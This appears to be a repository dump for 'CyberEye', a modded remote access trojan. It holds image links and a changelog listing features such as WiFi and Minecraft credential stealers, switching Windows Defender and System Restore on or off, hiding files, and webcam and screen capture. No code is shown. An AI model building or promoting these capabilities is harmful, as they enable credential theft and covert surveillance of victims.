-------------------------------------------------------------------------------- /images/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/logo.jpg -------------------------------------------------------------------------------- /images/openConfig.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/openConfig.JPG -------------------------------------------------------------------------------- /images/openMalware.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/openMalware.JPG -------------------------------------------------------------------------------- /images/saveConfig.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/saveConfig.JPG -------------------------------------------------------------------------------- /images/vs.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/images/vs.JPG -------------------------------------------------------------------------------- /logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cisamu123/CyberEye/400304341c147a2b17edf5a706635f87aa68f53f/logo.jpg -------------------------------------------------------------------------------- /moddedLog.txt: -------------------------------------------------------------------------------- 1 | ==================== 2 | MODDED CHANGELOG 3 | ==================== 4 | 5 | Modded Version 1.0.0 (Released: 24.07.2023): 6 | 7 | - Added AssemblyInfo changes in config.cs. 8 | - Added the Beep function (HZ). 9 | - Added the Cycle function, which starts any process in a cycle, such as %temp% or cmd.exe. 10 | - Added hiding/unhiding of the tray. 11 | - Added a function to set the cursor position to a random location. 12 | - Added a compiler for VB.NET and C#. 13 | - Added hide/unhide file or directory. 14 | - Added a WiFi info stealer. 15 | - Added a function to enable or disable the Registry Editor. 16 | - Added a function to enable or disable Windows Defender. 17 | - Added a function to enable or disable CMD. 18 | - Added a function to enable or disable System Restore. 19 | - Added getting the windows user screen resolution. 20 | - Added checking if RAT started with admin rights. 21 | 22 | Modded Version 1.0.1 (Released: 22.10.2023): 23 | 24 | - Added Bug Report 25 | 26 | Modded Version 1.0.2 (Released: 16.01.2024): 27 | 28 | - Added Minecraft Stealer 29 | 30 | Bug Fix (Released: 27.01.2024): 31 | 32 | - Minecraft stealer - If an archive in the Minecraft folder with all the data exists, the program automatically deletes the old archive and replaces it with a new one so that there is no error 33 | - Project File - the stealer folder was not contains by the project folder in visual studio file explorer 34 | 35 | Bug Fix & Added New Command (Released: 22.07.2024): 36 | 37 | - Command Added: /CamList - 📷 Lists all available webcams with their index and name, making it easy to see what devices are connected! 38 | 39 | - Fixed ChangeDateTime command 40 | Bug: /ChangeDateTime ignored arguments and set a fixed date. 41 | Fix: Now parses and applies user-provided date and time values correctly. 42 | 43 | Updated Desktop Screenshot Method & Added New Command (Released: 04.08.2024): 44 | 45 | - Command Added: /MonitorList - 🖥️ Lists all available monitors with their index and name, making it easy to see what devices are connected! 46 | 47 | - Now I have updated the Desktop Screenshot method, and it is now possible to take a screenshot of the monitor you need. 48 | -------------------------------------------------------------------------------- /version.txt: -------------------------------------------------------------------------------- 1 | 1.0.2 --------------------------------------------------------------------------------